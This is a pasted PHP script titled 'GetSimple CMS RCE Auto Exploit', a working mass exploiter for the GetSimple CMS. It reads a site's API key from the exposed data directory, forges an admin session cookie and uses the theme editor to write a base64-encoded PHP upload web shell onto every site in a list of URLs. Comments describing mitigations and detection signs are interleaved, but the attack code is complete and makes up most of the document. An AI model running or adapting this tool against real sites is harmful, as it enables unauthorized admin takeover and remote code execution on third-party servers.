ToKeiChun

GetSimple CMS RCE Auto Exploit

Jun 8th, 2019 (edited)
  1. <?php
  2. /**
  3. * @author Con7ext <kreonrinto@gmail.com>
  4. * GetCMS Mass Exploiter
  5. **/
class getCMS{
  /**
   * Exploit driver for one GetSimple CMS site.
   *
   * Each step below works only because of a specific exposure on the target
   * (web-readable data/ directory, directory listing, deterministic session
   * cookie, theme editor that writes to an arbitrary file name). The comments
   * on each method record the defensive control that breaks that step and the
   * request or artifact a defender can look for — they describe the risk, not
   * how to extend the tool.
   */
  public $url;      // base URL of the site, taken verbatim from the input list
  public $user;     // admin username read from a data/users/ listing, or "admin"
  public $cookie;   // forged "GS_ADMIN_USERNAME=...;<name>=<value>" cookie string
  public $headers;  // curl header array carrying $cookie
  public $apikey;   // site API key read from data/other/authorization.xml
  public $version;  // CMS version with the dots removed, read from the admin page
  public $shell;    // file name written under theme/ (on-disk indicator)
  public $payload;  // PHP source written as that file's content
  public function __construct($url){
    $this->url = $url;
    $this->user = null;
    $this->cookie = null;
    $this->apikey = null;
    $this->version = null;
    $this->headers = null;
    $this->shell = "0x0x0.php";
    // The base64 decodes to a short PHP file-upload handler (a web shell).
    // Defender note: theme/0x0x0.php — or any .php under theme/ that is not part
    // of the installed theme — is the on-disk indicator left by this tool.
    $this->payload = base64_decode("PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snZiddWyduYW1lJ10pKXskbmFtZSA9ICRfRklMRVNbJ2YnXVsnbmFtZSddOyRuMiA9ICRfRklMRVNbJ2YnXVsndG1wX25hbWUnXTtAbW92ZV91cGxvYWRlZF9maWxlKCRuMiwgJG5hbWUpOyBlY2hvICRuYW1lO31lbHNleyBlY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pj4nPiI7fSA/Pg==");
  }
  /**
   * Minimal curl wrapper: GET by default, POST when $post is non-empty,
   * extra request headers when $header is non-empty, up to 10 redirects.
   *
   * @return array{head:int, body:string|false} HTTP status code and response body
   */
  public function makeRequest($url, $post = null, $header = null){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 10);
    if($header && !empty($header)){
      curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    if($post && !empty($post)){
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $re = curl_exec($ch);
    $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [
      "head" => $http,
      "body" => $re
    ];
  }
  // Wraps the forged cookie string as the single request header used from here on.
  public function genHeader(){
    $this->headers = array("Cookie: ".$this->cookie);
  }
  /**
   * Builds an admin session cookie without ever logging in.
   *
   * The tool assumes GetSimple derives both the cookie name and its value
   * purely from values it already holds (version, apikey, user), so an exposed
   * API key is equivalent to an exposed admin session.
   * Mitigation: rotate the API key in data/other/authorization.xml after any
   * exposure — a cookie forged from the old key no longer matches.
   */
  public function genCookie(){
    $this->cookie = "GS_ADMIN_USERNAME=".$this->user.";".$this->CookieName()."=".$this->CookieValue();
    $this->genHeader();
  }
  // Cookie name = sha1("getsimple_cookie_" . version . apikey); no secret beyond the API key.
  public function CookieName(){
    $cname = "getsimple_cookie_".$this->version.$this->apikey;
    $sh = sha1($cname);
    return $sh;
  }
  // Cookie value = sha1(user . apikey); same remark as CookieName().
  public function CookieValue(){
    $cvalue = $this->user.$this->apikey;
    $sh = sha1($cvalue);
    return $sh;
  }
  /**
   * Reads the CMS version from the "?v=" query string of jquery.getsimple.js
   * on the /admin page and stores it with the dots removed.
   * Detection note: on its own this is an ordinary GET of /admin and carries
   * no signal; it is the requests that follow that matter.
   *
   * @return bool true when a version string was found
   */
  public function version(){
    $meh = $this->makeRequest($this->url."/admin");
    preg_match_all("|src=\"template/js/jquery.getsimple.js\?v=(.*?)\">|", $meh["body"], $vers);
    if(!empty($vers[1][0])){
      $this->version = str_replace(".", "", $vers[1][0]);
      return true;
    }
    else{
      echo "\033[0;31mI can't find Version ;D\n";
      return false;
    }
  }
  /**
   * Reads the API key straight out of data/other/authorization.xml over HTTP.
   *
   * Root cause: the data/ directory is reachable from the web.
   * Mitigation: deny direct HTTP access to data/ at the web server and confirm
   * the denial actually applies (per-directory .htaccess rules are ignored by
   * servers that do not read them).
   * Detection: any 200 response to GET /data/other/authorization.xml.
   *
   * @return bool true when an <apikey> CDATA value was found
   */
  public function getApikey(){
    $meh = $this->makeRequest($this->url."/data/other/authorization.xml");
    preg_match_all("|<apikey><\!\[CDATA\[(.*?)\]\]></apikey>|", $meh["body"], $vers);
    if(!empty($vers[1][0])){
      $this->apikey = $vers[1][0];
      return true;
    }
    else{
      echo "\033[0;31mI can't get apikey :D\n";
      return false;
    }
  }
  /**
   * Picks the admin username from a directory listing of data/users/ (one
   * <name>.xml per user), falling back to "admin".
   *
   * Root cause: directory listing enabled on a web-readable data/ directory.
   * Mitigation: disable autoindex and deny HTTP access to data/.
   * Detection: GET /data/users/ answered with 200 and a listing.
   *
   * @return bool|null true on the 200 path; the non-200 branch has no return
   */
  public function getUser(){
    $meh = $this->makeRequest($this->url."/data/users/");
    if($meh["head"] == 200){
      preg_match_all("|<a href=\"(.*?).xml\">|", $meh["body"], $vers);
      if(!empty($vers[1][0])){
        $this->user = $vers[1][0];
        return true;
      }
      else{
        $this->user = "admin";
        return true;
      }
    }
    else{
      $this->user = "admin";
    }
  }
  /**
   * Fetches the CSRF nonce from /admin/theme-edit.php while presenting the
   * forged cookie. A nonce coming back here means the server accepted the
   * forged session, which is itself worth alerting on (admin page served to a
   * client that never hit the login form).
   *
   * @return string|null the hidden "nonce" field value, or null if absent
   */
  public function getNonce(){
    $req = $this->makeRequest($this->url."/admin/theme-edit.php", null, $this->headers);
    preg_match_all("|nonce\" type=\"hidden\" value=\"(.*)\"|", $req["body"], $vers);
    if(!empty($vers[1][0])){
     return $vers[1][0];
    }
    else{
      echo "\033[0;31mi can't find nonce :D\n";
    }
  }
  /**
   * Writes $payload to theme/$shell through the theme editor's save action;
   * "edited_file" names the destination file and nothing in the request ties
   * it to an existing theme file. Absence of "CSRF detected" in the response
   * is taken as success.
   *
   * Detection: POST /admin/theme-edit.php with submitsave=2 whose edited_file
   * value ends in .php or is not an existing theme file; a new .php appearing
   * under theme/ afterwards.
   * Mitigation: the editor should only accept names that resolve to existing,
   * non-executable files inside the active theme — verify this on the installed
   * version rather than assuming it.
   */
  public function upload(){
    $n = $this->getNonce();
    $data = array(
      "submitsave" => "2",
      "edited_file" => $this->shell,
      "content" => $this->payload,
      "nonce" => $n);
    $req = $this->makeRequest($this->url."/admin/theme-edit.php", $data, $this->headers);
    if(!preg_match("|CSRF detected|", $req["body"])){
      echo "\033[0;32mSuccess -> ".$this->url."/theme/".$this->shell."\n";
    }
    else{
      echo "\033[0;31mFailed\n";
    }
  }
  /**
   * Runs the chain in order: version -> apikey -> user -> forged cookie -> write.
   * From a log-review standpoint the full sequence from one client is the
   * signature: GET /admin, GET /data/other/authorization.xml, GET /data/users/,
   * GET then POST /admin/theme-edit.php — with no request to the login form
   * in between.
   */
  public function exploit(){
    echo "\n\033[1;37m[+] ".$this->url." [+]\n";
    echo "\033[0;34m[+]Getting Version\n";
    if($this->version()){
      echo "[+]\033[0;34mGetting Apikey\n";
      if($this->getApikey()){
        echo "[+]\033[0;34mGetting User\n";
        if($this->getUser()){
          $this->genCookie();
          echo "[+]\033[0;34mUploading Shell\n";
          $this->upload();
        }
      }
    }
  }
}
// Entry point: argv[1] is a newline-separated list of base URLs; the same
// request chain is run against every line. Defender note: the identical
// sequence hitting many unrelated hosts from one source address is the
// network-level signature of this kind of mass scanner.
$list = $argv[1];
$mek = file_get_contents($list);
$mes = explode("\n", $mek);
foreach($mes as $site){
  $t = new getCMS($site);
  $t->exploit();
}
echo "\033[1;37m";